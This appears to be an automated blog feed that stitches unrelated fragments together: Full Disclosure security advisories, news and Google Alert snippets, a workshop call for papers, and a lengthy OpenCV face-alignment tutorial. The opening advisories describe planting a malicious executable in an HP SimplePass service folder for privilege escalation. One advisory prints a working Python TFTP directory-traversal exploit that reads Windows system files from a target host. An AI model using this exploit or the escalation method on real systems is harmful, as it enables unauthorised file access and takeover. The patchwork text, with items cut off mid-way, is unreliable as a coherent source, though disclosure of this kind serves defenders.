BUILTIN\Users:(I)(RX)                                             BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)   b) C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i "HP SimplePass" HP SimplePass Cachedrv Service   Cachedrv server   "C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe"       Auto HP SimplePass Service            omniserv           C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe         Auto A user can place a malicious DLL/EXE (e.g OmniServ.exe) file with one of the expected names into that directory and wait until the service is restarted. The service can not be restarted by normal users but an attacker could just reboot the system or wait for the next reboot to happen. ############################################################################################### 3) Mitigation: ############################################################################################### Change the permission for dirctory to group other than Administrator on Read/Execute. Fix: http://ift.tt/2ra9NcO

Source: Gmail -> IFTTT-> Blogger

Re: [FD] [oss-security] Multiple crashes in OpenEXR

[FD] CVE-2017-7620 Mantis Bug Tracker 1.3.10 / v2.3.0 CSRF Permalink Injection

[+] Credits: John Page a.k.a hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://ift.tt/2rHIDXS [+] ISR: ApparitionSec Vendor: ================ www.mantisbt.org Product: ========= Mantis Bug Tracker 1.3.10 / v2.3.0 MantisBT is a popular free web-based bug tracking system. It is written in PHP works with MySQL, MS SQL, and PostgreSQL databases. Vulnerability Type: ======================== CSRF Permalink Injection CVE Reference: ============== CVE-2017-7620 Security Issue: ================ Remote attackers can inject arbitrary permalinks into the mantisbt Web Interface if an authenticated user visits a malicious webpage. Vuln code in "string_api.php" PHP file, under mantis/core/ did not account for supplied backslashes. Line: 270 # Check for URL's pointing to other domains if( 0 == $t_type || empty( $t_matches['script'] ) || 3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) { return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php'; } # Start extracting regex matches $t_script = $t_matches['script']; $t_script_path = $t_matches['path']; Exploit/POC: =============

OR

Network Access: =============== Remote Severity: ========= Medium Disclosure Timeline: ============================= Vendor Notification: April 9, 2017 Vendor Release Fix: May 15, 2017 Vendor Disclosed: May 20, 2017 May 20, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

Ravens: Former Navy QB Keenan Reynolds could emerge from a crowded field of WRs vying for No. 3 spot (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal

[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://ift.tt/2rCsbYO [+] ISR: ApparitionSec Vendor: ==================== www.secure-bytes.com Product: ===================== Secure Auditor - v3.0 Vulnerability Type: =================== Directory Traversal CVE Reference: ============== CVE-2017-9024 Security Issue: ================ Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname. Exploit/POC: ============= import sys,socket print 'Secure Auditor v3.0 / Cisco Config Manager' print 'TFTP Directory Traversal Exploit' print 'Read ../../../../Windows/system.ini POC' print 'hyp3rlinx' HOST = raw_input("[IP]> ") FILE = '../../../../Windows/system.ini' PORT = 69 PAYLOAD = "\x00\x01" #TFTP Read PAYLOAD += FILE+"\x00" #Read system.ini using directory traversal PAYLOAD += "netascii\x00" #TFTP Type s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(PAYLOAD, (HOST, PORT)) out = s.recv(1024) s.close() print "Victim Data located on : %s " %(HOST) print out.strip() Network Access: =============== Remote Severity: ========= High Disclosure Timeline: ================================== Vendor Notification: May 10, 2017 No replies May 20, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

Re: [FD] CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal

Alcoholics Anonymous sues to recover original manuscript

By Jonathan Stempel (Reuters) - The original manuscript that became the basis for Alcoholics Anonymous is the subject of a new lawsuit by the ...

from Google Alert - anonymous http://ift.tt/2qIdsxd
via IFTTT

Anonymous - Private Chef

Anonymous - Private Chef – Boston Restaurant Jobs - BostonChefs.com's Industry Insider, the best jobs at Boston restaurants.

from Google Alert - anonymous http://ift.tt/2qcPNS2
via IFTTT

New App Allows Instant, Anonymous Communication With Campus Police

Point Park University now offers members of its community a way to anonymously send secure messages to campus police through a free smartphone ...

from Google Alert - anonymous http://ift.tt/2qHVeMm
via IFTTT

[FD] CVE-2017-9046 Pegasus "winpm-32.exe" v4.72 Mailto: Link Remote Code Execution

[FD] CFP - WPES - 2017 Workshop on Privacy in the Electronic Society

CALL FOR PAPERS =============== ****************************************************** 2017 Workshop on Privacy in the Electronic Society (WPES 2017) Dallas, Texas, USA - October 30, 2017 http://ift.tt/2q3OIkc ****************************************************** The need for privacy-aware policies, regulations, and techniques has been widely recognized. This workshop discusses the problems of privacy in the global interconnected societies and possible solutions. The 2017 Workshop, held in conjunction with the ACM CCS conference, is the sixteenth in a yearly forum for papers on all the different aspects of privacy in today's electronic society. The workshop seeks submissions from academia and industry presenting novel research on all theoretical and practical aspects of electronic privacy, as well as experimental studies of fielded systems. We encourage submissions from other communities such as law and business that present these communities' perspectives on technological issues. Topics of interest include, but are not limited to: - anonymization and trasparency - crowdsourcing for privacy and security - data correlation and leakage attacks - data security and privacy - data and computations integrity in emerging scenarios - electronic communication privacy - economics of privacy - information dissemination control - models, languages, and techniques for big data protection - personally identifiable information - privacy-aware access control - privacy and anonymity on the web - privacy in biometric systems - privacy in cloud and grid systems - privacy and confidentiality management - privacy and data mining - privacy in the Internet of Things - privacy in the digital business - privacy in the electronic records - privacy enhancing technologies - privacy and human rights - privacy in health care and public administration - privacy metrics - privacy in mobile systems - privacy in outsourced scenarios - privacy policies - privacy vs. security - privacy of provenance data - privacy in social networks - privacy threats - privacy and virtual identity - user profiling - wireless privacy PAPER SUBMISSIONS

Source: Gmail -> IFTTT-> Blogger

I have a new follower on Twitter

DAR Partners
D|A|R Partners helps innovative data, analytic and research companies develop and expand business, with a focus on financial markets.
Washington DC & New York City
https://t.co/Y8e4ydw97L
Following: 10335 - Followers: 11095

May 22, 2017 at 02:54PM via Twitter http://twitter.com/DARPartners

Newly Found Malware Uses 7 NSA Hacking Tools, Where WannaCry Uses 2

A security researcher has identified a new strain of malware that also spreads itself by exploiting flaws in Windows SMB file sharing protocol, but unlike the WannaCry Ransomware that uses only two leaked NSA hacking tools, it exploits all the seven. Last week, we warned you about multiple hacking groups exploiting leaked NSA hacking tools, but almost all of them were making use of only two

from The Hacker News http://ift.tt/2qcmYVI
via IFTTT

Face Alignment with OpenCV and Python

Continuing our series of blog posts on facial landmarks, today we are going to discuss face alignment, the process of:

1. Identifying the geometric structure of faces in digital images.
2. Attempting to obtain a canonical alignment of the face based on translation, scale, and rotation.

There are many forms of face alignment.

Some methods try to impose a (pre-defined) 3D model and then apply a transform to the input image such that the landmarks on the input face match the landmarks on the 3D model.

Other, more simplistic methods (like the one discussed in this blog post), rely only on the facial landmarks themselves (in particular, the eye regions) to obtain a normalized rotation, translation, and scale representation of the face.

The reason we perform this normalization is due to the fact that many facial recognition algorithms, including Eigenfaces, LBPs for face recognition, Fisherfaces, and deep learning/metric methods can all benefit from applying facial alignment before trying to identify the face.

Thus, face alignment can be seen as a form of “data normalization”. Just as you may normalize a set of feature vectors via zero centering or scaling to unit norm prior to training a machine learning model, it’s very common to align the faces in your dataset before training a face recognizer.

By performing this process, you’ll enjoy higher accuracy from your face recognition models.

Note: If you’re interested in learning more about creating your own custom face recognizers, be sure to refer to the PyImageSearch Gurus course where I provide detailed tutorials on face recognition.

To learn more about face alignment and normalization, just keep reading.

Looking for the source code to this post?
Jump right to the downloads section.

Face alignment with OpenCV and Python

The purpose of this blog post is to demonstrate how to align a face using OpenCV, Python, and facial landmarks.

Given a set of facial landmarks (the input coordinates) our goal is to warp and transform the image to an output coordinate space.

In this output coordinate space, all faces across an entire dataset should:

1. Be centered in the image.
2. Be rotated that such the eyes lie on a horizontal line (i.e., the face is rotated such that the eyes lie along the same y-coordinates).
3. Be scaled such that the size of the faces are approximately identical.

To accomplish this, we’ll first implement a dedicated Python class to align faces using an affine transformation. I’ve already implemented this FaceAligner class in imutils.

Note: Affine transformations are used for rotating, scaling, translating, etc. We can pack all three of the above requirements into a single

cv2.warpAffine

  call; the trick is creating the rotation matrix,

M

 .

We’ll then create an example driver Python script to accept an input image, detect faces, and align them.

Finally, we’ll review the results from our face alignment with OpenCV process.

Implementing our face aligner

The face alignment algorithm itself is based on Chapter 8 of Mastering OpenCV with Practical Computer Vision Projects (Baggio, 2012), which I highly recommend if you have a C++ background or interest. The book provides open-access code samples on GitHub.

Let’s get started by examining our

FaceAligner

  implementation and understanding what’s going on under the hood.

# import the necessary packages
from .helpers import FACIAL_LANDMARKS_IDXS
from .helpers import shape_to_np
import numpy as np
import cv2

class FaceAligner:
    def __init__(self, predictor, desiredLeftEye=(0.35, 0.35),
        desiredFaceWidth=256, desiredFaceHeight=None):
        # store the facial landmark predictor, desired output left
        # eye position, and desired output face width + height
        self.predictor = predictor
        self.desiredLeftEye = desiredLeftEye
        self.desiredFaceWidth = desiredFaceWidth
        self.desiredFaceHeight = desiredFaceHeight

        # if the desired face height is None, set it to be the
        # desired face width (normal behavior)
        if self.desiredFaceHeight is None:
            self.desiredFaceHeight = self.desiredFaceWidth

Lines 2-5 handle our imports. To read about facial landmarks and our associated helper functions, be sure to check out this previous post.

On Line 7, we begin our

FaceAligner

  class with our constructor being defined on Lines 8-20.

Our constructor has 4 parameters:

• predictor
  

   : The facial landmark predictor model.

• desiredLeftEye
  

   : An optional (x, y) tuple with the default shown, specifying the desired output left eye position. For this variable, it is common to see percentages within the range of 20-40%. These percentages control how much of the face is visible after alignment. The exact percentages used will vary on an application-to-application basis. With 20% you’ll basically be getting a “zoomed in” view of the face, whereas with larger values the face will appear more “zoomed out.”

• desiredFaceWidth
  

   : Another optional parameter that defines our desired face with in pixels. We default this value to 256 pixels.

• desiredFaceHeight
  

   : The final optional parameter specifying our desired face height value in pixels.

Each of these parameters is set to a corresponding instance variable on Lines 12-15.

Next, let’s decide whether we want a square image of a face, or something rectangular. Lines 19 and 20 check if the

desiredFaceHeight

  is

None

 , and if so, we set it to the

desiredFaceWidth

 , meaning that the face is square. A square image is the typical case. Alternatively, we can specify different values for both  

desiredFaceWidth

  and

desiredFaceHeight

  to obtain a rectangular region of interest.

Now that we have constructed our

FaceAligner

  object, we will next define a function which aligns the face.

This function is a bit long, so I’ve broken it up into 5 code blocks to make it more digestible:

# import the necessary packages
from .helpers import FACIAL_LANDMARKS_IDXS
from .helpers import shape_to_np
import numpy as np
import cv2

class FaceAligner:
    def __init__(self, predictor, desiredLeftEye=(0.35, 0.35),
        desiredFaceWidth=256, desiredFaceHeight=None):
        # store the facial landmark predictor, desired output left
        # eye position, and desired output face width + height
        self.predictor = predictor
        self.desiredLeftEye = desiredLeftEye
        self.desiredFaceWidth = desiredFaceWidth
        self.desiredFaceHeight = desiredFaceHeight

        # if the desired face height is None, set it to be the
        # desired face width (normal behavior)
        if self.desiredFaceHeight is None:
            self.desiredFaceHeight = self.desiredFaceWidth

    def align(self, image, gray, rect):
        # convert the landmark (x, y)-coordinates to a NumPy array
        shape = self.predictor(gray, rect)
        shape = shape_to_np(shape)

        # extract the left and right eye (x, y)-coordinates
        (lStart, lEnd) = FACIAL_LANDMARKS_IDXS["left_eye"]
        (rStart, rEnd) = FACIAL_LANDMARKS_IDXS["right_eye"]
        leftEyePts = shape[lStart:lEnd]
        rightEyePts = shape[rStart:rEnd]

Beginning on Line 22, we define the align function which accepts three parameters:

• image
  

   : The RGB input image.

• gray
  

   : The grayscale input image.

• rect
  

   : The bounding box rectangle produced by dlib’s HOG face detector.

On Lines 24 and 25, we apply dlib’s facial landmark predictor and convert the landmarks into (x, y)-coordinates in NumPy format.

Next, on Lines 28 and 29 we read the

left_eye

  and

right_eye

  regions from the

FACIAL_LANDMARK_IDXS

  dictionary, found in the

helpers.py

  script. These 2-tuple values are stored in left/right eye starting and ending indices.

The

leftEyePts

  and

rightEyePts

  are extracted from the shape list using the starting and ending indices on Lines 30 and 31.

Next, let’s will compute the center of each eye as well as the angle between the eye centroids.

This angle serves as the key component for aligning our image.

The angle of the green line between the eyes, shown in Figure 1 below, is the one that we are concerned about.

Figure 1: Computing the angle between two eyes for face alignment.

To see how the angle is computed, refer to the code block below:

# import the necessary packages
from .helpers import FACIAL_LANDMARKS_IDXS
from .helpers import shape_to_np
import numpy as np
import cv2

class FaceAligner:
    def __init__(self, predictor, desiredLeftEye=(0.35, 0.35),
        desiredFaceWidth=256, desiredFaceHeight=None):
        # store the facial landmark predictor, desired output left
        # eye position, and desired output face width + height
        self.predictor = predictor
        self.desiredLeftEye = desiredLeftEye
        self.desiredFaceWidth = desiredFaceWidth
        self.desiredFaceHeight = desiredFaceHeight

        # if the desired face height is None, set it to be the
        # desired face width (normal behavior)
        if self.desiredFaceHeight is None:
            self.desiredFaceHeight = self.desiredFaceWidth

    def align(self, image, gray, rect):
        # convert the landmark (x, y)-coordinates to a NumPy array
        shape = self.predictor(gray, rect)
        shape = shape_to_np(shape)

        # extract the left and right eye (x, y)-coordinates
        (lStart, lEnd) = FACIAL_LANDMARKS_IDXS["left_eye"]
        (rStart, rEnd) = FACIAL_LANDMARKS_IDXS["right_eye"]
        leftEyePts = shape[lStart:lEnd]
        rightEyePts = shape[rStart:rEnd]

        # compute the center of mass for each eye
        leftEyeCenter = leftEyePts.mean(axis=0).astype("int")
        rightEyeCenter = rightEyePts.mean(axis=0).astype("int")

        # compute the angle between the eye centroids
        dY = rightEyeCenter[1] - leftEyeCenter[1]
        dX = rightEyeCenter[0] - leftEyeCenter[0]
        angle = np.degrees(np.arctan2(dY, dX)) - 180

On Lines 34 and 35 we compute the centroid, also known as the center of mass, of each eye by averaging all (x, y) points of each eye, respectively.

Given the eye centers, we can compute differences in (x, y)-coordinates and take the arc-tangent to obtain angle of rotation between eyes.

This angle will allow us to correct for rotation.

To determine the angle, we start by computing the delta in the y-direction,

dY

 . This is done by finding the difference between the

rightEyeCenter

  and the

leftEyeCenter

  on Line 38.

Similarly, we compute

dX

 , the delta in the x-direction on Line 39.

Next, on Line 40, we compute the angle of the face rotation. We use NumPy’s

arctan2

  function with arguments

dY

  and

dX

 , followed by converting to degrees while subtracting 180 to obtain the angle.

In the following code block we compute the desired right eye coordinate (as a function of the left eye placement) as well as calculating the scale of the new resulting image.

# import the necessary packages
from .helpers import FACIAL_LANDMARKS_IDXS
from .helpers import shape_to_np
import numpy as np
import cv2

class FaceAligner:
    def __init__(self, predictor, desiredLeftEye=(0.35, 0.35),
        desiredFaceWidth=256, desiredFaceHeight=None):
        # store the facial landmark predictor, desired output left
        # eye position, and desired output face width + height
        self.predictor = predictor
        self.desiredLeftEye = desiredLeftEye
        self.desiredFaceWidth = desiredFaceWidth
        self.desiredFaceHeight = desiredFaceHeight

        # if the desired face height is None, set it to be the
        # desired face width (normal behavior)
        if self.desiredFaceHeight is None:
            self.desiredFaceHeight = self.desiredFaceWidth

    def align(self, image, gray, rect):
        # convert the landmark (x, y)-coordinates to a NumPy array
        shape = self.predictor(gray, rect)
        shape = shape_to_np(shape)

        # extract the left and right eye (x, y)-coordinates
        (lStart, lEnd) = FACIAL_LANDMARKS_IDXS["left_eye"]
        (rStart, rEnd) = FACIAL_LANDMARKS_IDXS["right_eye"]
        leftEyePts = shape[lStart:lEnd]
        rightEyePts = shape[rStart:rEnd]

        # compute the center of mass for each eye
        leftEyeCenter = leftEyePts.mean(axis=0).astype("int")
        rightEyeCenter = rightEyePts.mean(axis=0).astype("int")

        # compute the angle between the eye centroids
        dY = rightEyeCenter[1] - leftEyeCenter[1]
        dX = rightEyeCenter[0] - leftEyeCenter[0]
        angle = np.degrees(np.arctan2(dY, dX)) - 180

        # compute the desired right eye x-coordinate based on the
        # desired x-coordinate of the left eye
        desiredRightEyeX = 1.0 - self.desiredLeftEye[0]

        # determine the scale of the new resulting image by taking
        # the ratio of the distance between eyes in the *current*
        # image to the ratio of distance between eyes in the
        # *desired* image
        dist = np.sqrt((dX ** 2) + (dY ** 2))
        desiredDist = (desiredRightEyeX - self.desiredLeftEye[0])
        desiredDist *= self.desiredFaceWidth
        scale = desiredDist / dist

On Line 44, we calculate the desired right eye based upon the desired left eye x-coordinate. We subtract

self.desiredLeftEye[0]

  from

1.0

  because the

desiredRightEyeX

  value should be equidistant from the right edge of the image as the corresponding left eye x-coordinate is from its left edge.

We can then determine the

scale

  of the face by taking the ratio of the distance between the eyes in the current image to the distance between eyes in the desired image

First, we compute the Euclidean distance ratio,

dist

 , on Line 50.

Next, on Line 51, using the difference between the right and left eye x-values we compute the desired distance,

desiredDist

 .

We update the

desiredDist

  by multiplying it by the

desiredFaceWidth

  on Line 52. This essentially scales our eye distance based on the desired width.

Finally, our scale is computed by dividing

desiredDist

  by our previously calculated

dist

 .

Now that we have our rotation

angle

  and

scale

 , we will need to take a few steps before we compute the affine transformation. This includes finding the midpoint between the eyes as well as calculating the rotation matrix and updating its translation component:

# import the necessary packages
from .helpers import FACIAL_LANDMARKS_IDXS
from .helpers import shape_to_np
import numpy as np
import cv2

class FaceAligner:
    def __init__(self, predictor, desiredLeftEye=(0.35, 0.35),
        desiredFaceWidth=256, desiredFaceHeight=None):
        # store the facial landmark predictor, desired output left
        # eye position, and desired output face width + height
        self.predictor = predictor
        self.desiredLeftEye = desiredLeftEye
        self.desiredFaceWidth = desiredFaceWidth
        self.desiredFaceHeight = desiredFaceHeight

        # if the desired face height is None, set it to be the
        # desired face width (normal behavior)
        if self.desiredFaceHeight is None:
            self.desiredFaceHeight = self.desiredFaceWidth

    def align(self, image, gray, rect):
        # convert the landmark (x, y)-coordinates to a NumPy array
        shape = self.predictor(gray, rect)
        shape = shape_to_np(shape)

        # extract the left and right eye (x, y)-coordinates
        (lStart, lEnd) = FACIAL_LANDMARKS_IDXS["left_eye"]
        (rStart, rEnd) = FACIAL_LANDMARKS_IDXS["right_eye"]
        leftEyePts = shape[lStart:lEnd]
        rightEyePts = shape[rStart:rEnd]

        # compute the center of mass for each eye
        leftEyeCenter = leftEyePts.mean(axis=0).astype("int")
        rightEyeCenter = rightEyePts.mean(axis=0).astype("int")

        # compute the angle between the eye centroids
        dY = rightEyeCenter[1] - leftEyeCenter[1]
        dX = rightEyeCenter[0] - leftEyeCenter[0]
        angle = np.degrees(np.arctan2(dY, dX)) - 180

        # compute the desired right eye x-coordinate based on the
        # desired x-coordinate of the left eye
        desiredRightEyeX = 1.0 - self.desiredLeftEye[0]

        # determine the scale of the new resulting image by taking
        # the ratio of the distance between eyes in the *current*
        # image to the ratio of distance between eyes in the
        # *desired* image
        dist = np.sqrt((dX ** 2) + (dY ** 2))
        desiredDist = (desiredRightEyeX - self.desiredLeftEye[0])
        desiredDist *= self.desiredFaceWidth
        scale = desiredDist / dist

        # compute center (x, y)-coordinates (i.e., the median point)
        # between the two eyes in the input image
        eyesCenter = ((leftEyeCenter[0] + rightEyeCenter[0]) // 2,
            (leftEyeCenter[1] + rightEyeCenter[1]) // 2)

        # grab the rotation matrix for rotating and scaling the face
        M = cv2.getRotationMatrix2D(eyesCenter, angle, scale)

        # update the translation component of the matrix
        tX = self.desiredFaceWidth * 0.5
        tY = self.desiredFaceHeight * self.desiredLeftEye[1]
        M[0, 2] += (tX - eyesCenter[0])
        M[1, 2] += (tY - eyesCenter[1])

On Lines 57 and 58, we compute

eyesCenter

 , the midpoint between the left and right eyes. This will be used in our rotation matrix calculation. In essence, this midpoint is at the top of the nose and is the point at which we will rotate the face around:

Figure 2: Computing the midpoint (blue) between two eyes. This will serve as the (x, y)-coordinate in which we rotate the face around.

To compute our rotation matrix,

M

 , we utilize

cv2.getRotationMatrix2D

  specifying

eyesCenter

 ,

angle

 , and

scale

 (Line 61). Each of these three values have been previously computed, so refer back to Line 40, Line 53, and Line 57 as needed.

A description of the parameters to

cv2.getRotationMatrix2D

  follow:

• eyesCenter
  

   : The midpoint between the eyes is the point at which we will rotate the face around.

• angle
  

   : The angle we will rotate the face to to ensure the eyes lie along the same horizontal line.

• scale
  

   : The percentage that we will scale up or down the image, ensuring that the image scales to the desired size.

Now we must update the translation component of the matrix so that the face is still in the image after the affine transform.

On Line 64, we take half of the

desiredFaceWidth

  and store the value as

tX

 , the translation in the x-direction.

To compute

tY

 , the translation in the y-direction, we multiply the

desiredFaceHeight

  by the desired left eye y-value,

desiredLeftEye[1]

 .

Using

tX

  and

tY

 , we update the translation component of the matrix by subtracting each value from their corresponding eyes midpoint value,

eyesCenter

 (Lines 66 and 67).

We can now apply our affine transformation to align the face:

# import the necessary packages
from .helpers import FACIAL_LANDMARKS_IDXS
from .helpers import shape_to_np
import numpy as np
import cv2

class FaceAligner:
    def __init__(self, predictor, desiredLeftEye=(0.35, 0.35),
        desiredFaceWidth=256, desiredFaceHeight=None):
        # store the facial landmark predictor, desired output left
        # eye position, and desired output face width + height
        self.predictor = predictor
        self.desiredLeftEye = desiredLeftEye
        self.desiredFaceWidth = desiredFaceWidth
        self.desiredFaceHeight = desiredFaceHeight

        # if the desired face height is None, set it to be the
        # desired face width (normal behavior)
        if self.desiredFaceHeight is None:
            self.desiredFaceHeight = self.desiredFaceWidth

    def align(self, image, gray, rect):
        # convert the landmark (x, y)-coordinates to a NumPy array
        shape = self.predictor(gray, rect)
        shape = shape_to_np(shape)

        # extract the left and right eye (x, y)-coordinates
        (lStart, lEnd) = FACIAL_LANDMARKS_IDXS["left_eye"]
        (rStart, rEnd) = FACIAL_LANDMARKS_IDXS["right_eye"]
        leftEyePts = shape[lStart:lEnd]
        rightEyePts = shape[rStart:rEnd]

        # compute the center of mass for each eye
        leftEyeCenter = leftEyePts.mean(axis=0).astype("int")
        rightEyeCenter = rightEyePts.mean(axis=0).astype("int")

        # compute the angle between the eye centroids
        dY = rightEyeCenter[1] - leftEyeCenter[1]
        dX = rightEyeCenter[0] - leftEyeCenter[0]
        angle = np.degrees(np.arctan2(dY, dX)) - 180

        # compute the desired right eye x-coordinate based on the
        # desired x-coordinate of the left eye
        desiredRightEyeX = 1.0 - self.desiredLeftEye[0]

        # determine the scale of the new resulting image by taking
        # the ratio of the distance between eyes in the *current*
        # image to the ratio of distance between eyes in the
        # *desired* image
        dist = np.sqrt((dX ** 2) + (dY ** 2))
        desiredDist = (desiredRightEyeX - self.desiredLeftEye[0])
        desiredDist *= self.desiredFaceWidth
        scale = desiredDist / dist

        # compute center (x, y)-coordinates (i.e., the median point)
        # between the two eyes in the input image
        eyesCenter = ((leftEyeCenter[0] + rightEyeCenter[0]) // 2,
            (leftEyeCenter[1] + rightEyeCenter[1]) // 2)

        # grab the rotation matrix for rotating and scaling the face
        M = cv2.getRotationMatrix2D(eyesCenter, angle, scale)

        # update the translation component of the matrix
        tX = self.desiredFaceWidth * 0.5
        tY = self.desiredFaceHeight * self.desiredLeftEye[1]
        M[0, 2] += (tX - eyesCenter[0])
        M[1, 2] += (tY - eyesCenter[1])

        # apply the affine transformation
        (w, h) = (self.desiredFaceWidth, self.desiredFaceHeight)
        output = cv2.warpAffine(image, M, (w, h),
            flags=cv2.INTER_CUBIC)

        # return the aligned face
        return output

For convenience we store the

desiredFaceWidth

  and

desiredFaceHeight

  into

w

  and

h

  respectively (Line 70).

Then we perform our last step on Lines 70 and 71 by making a call to

cv2.warpAffine

 . This function call requires 3 parameters and 1 optional parameter:

• image
  

   : The face image.

• M
  

   : The translation, rotation, and scaling matrix.

• (w, h)
  

   : The desired width and height of the output face.

• flags
  

   : The interpolation algorithm to use for the warp, in this case

  INTER_CUBIC
  

   . To read about the other possible flags and image transformations, please consult the OpenCV documentation.

Finally, we return the aligned face on Line 75.

Aligning faces with OpenCV and Python

Now let’s put this alignment class to work with a simple driver script. Open up a new file, name it

align_faces.py

 , and let’s get to coding.

# import the necessary packages
from imutils.face_utils import FaceAligner
from imutils.face_utils import rect_to_bb
import argparse
import imutils
import dlib
import cv2

# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--shape-predictor", required=True,
help="path to facial landmark predictor")
ap.add_argument("-i", "--image", required=True,
help="path to input image")
args = vars(ap.parse_args())

On Lines 2-7 we import required packages.

If you do not have

imutils

  and/or

dlib

  installed on your system, then make sure you install/upgrade them via

pip

 :

$ pip install --upgrade imutils
$ pip install --upgrad dlib

Note: If you are using Python virtual environments (as all of my OpenCV install tutorials do), make sure you use the

workon

  command to access your virtual environment first, and then install/upgrade

imutils

  and

dlib

 .

Using

argparse

  on Lines 10-15, we specify 2 required command line arguments:

• --shape-predictor
  

   : The dlib facial landmark predictor.

• --image
  

   : The image containing faces.

In the next block of code we initialize our HOG-based detector (Histogram of Oriented Gradients), our facial landmark predictor, and our face aligner:

# import the necessary packages
from imutils.face_utils import FaceAligner
from imutils.face_utils import rect_to_bb
import argparse
import imutils
import dlib
import cv2

# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--shape-predictor", required=True,
        help="path to facial landmark predictor")
ap.add_argument("-i", "--image", required=True,
        help="path to input image")
args = vars(ap.parse_args())

# initialize dlib's face detector (HOG-based) and then create
# the facial landmark predictor and the face aligner
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(args["shape_predictor"])
fa = FaceAligner(predictor, desiredFaceWidth=256)

Line 19 initializes our detector object using dlib’s 

get_frontal_face_detector

 .

On Line 20 we instantiate our facial landmark predictor using,

--shape-predictor

 , the path to dlib’s pre-trained predictor.

We make use of the

FaceAligner

  class that we just built in the previous section by initializing a an object,

fa

 , on Line 21. We specify a face width of 256 pixels.

Next, let’s load our image and prepare it for face detection:

# import the necessary packages
from imutils.face_utils import FaceAligner
from imutils.face_utils import rect_to_bb
import argparse
import imutils
import dlib
import cv2

# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--shape-predictor", required=True,
        help="path to facial landmark predictor")
ap.add_argument("-i", "--image", required=True,
        help="path to input image")
args = vars(ap.parse_args())

# initialize dlib's face detector (HOG-based) and then create
# the facial landmark predictor and the face aligner
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(args["shape_predictor"])
fa = FaceAligner(predictor, desiredFaceWidth=256)

# load the input image, resize it, and convert it to grayscale
image = cv2.imread(args["image"])
image = imutils.resize(image, width=800)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)

# show the original input image and detect faces in the grayscale
# image
cv2.imshow("Input", image)
rects = detector(gray, 2)

On Line 24, we load our image specified by the command line argument

–-image

 . We resize the image maintaining the aspect ratio on Line 25 to have a width of 800 pixels. We then convert the image to grayscale on Line 26.

Detecting faces in the input image is handled on Line 31 where we apply dlib’s face detector. This function returns 

rects

  , a list of bounding boxes around the faces our detector has found.

In the next block, we iterate through

rects

 , align each face, and display the original and aligned images.

# import the necessary packages
from imutils.face_utils import FaceAligner
from imutils.face_utils import rect_to_bb
import argparse
import imutils
import dlib
import cv2

# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--shape-predictor", required=True,
        help="path to facial landmark predictor")
ap.add_argument("-i", "--image", required=True,
        help="path to input image")
args = vars(ap.parse_args())

# initialize dlib's face detector (HOG-based) and then create
# the facial landmark predictor and the face aligner
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(args["shape_predictor"])
fa = FaceAligner(predictor, desiredFaceWidth=256)

# load the input image, resize it, and convert it to grayscale
image = cv2.imread(args["image"])
image = imutils.resize(image, width=800)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)

# show the original input image and detect faces in the grayscale
# image
cv2.imshow("Input", image)
rects = detector(gray, 2)

# loop over the face detections
for rect in rects:
        # extract the ROI of the *original* face, then align the face
        # using facial landmarks
        (x, y, w, h) = rect_to_bb(rect)
        faceOrig = imutils.resize(image[y:y + h, x:x + w], width=256)
        faceAligned = fa.align(image, gray, rect)

        # display the output images
        cv2.imshow("Original", faceOrig)
        cv2.imshow("Aligned", faceAligned)
        cv2.waitKey(0)

We begin our loop on Line 34.

For each bounding box

rect

  predicted by dlib we convert it to the format

(x, y, w, h)

 (Line 37).

Subsequently, we resize the box to a width of 256 pixels, maintaining the aspect ratio, on Line 38. We store this original, but resized image, as

faceOrig

 .

On Line 39, we align the image, specifying our image, grayscale image, and rectangle.

Finally, Lines 42 and 43 display the original and corresponding aligned face image to the screen in respective windows.

On Line 44, we wait for the user to press a key with either window in focus, before displaying the next original/aligned image pair.

The process on Lines 35-44 is repeated for all faces detected, then the script exits.

To see our face aligner in action, head to next section.

Face alignment results

Let’s go ahead and apply our face aligner to some example images. Make sure you use the “Downloads” section of this blog post to download the source code + example images.

After unpacking the archive, execute the following command:

$ python align_faces.py \
        --shape-predictor shape_predictor_68_face_landmarks.dat \
        --image images/example_01.jpg

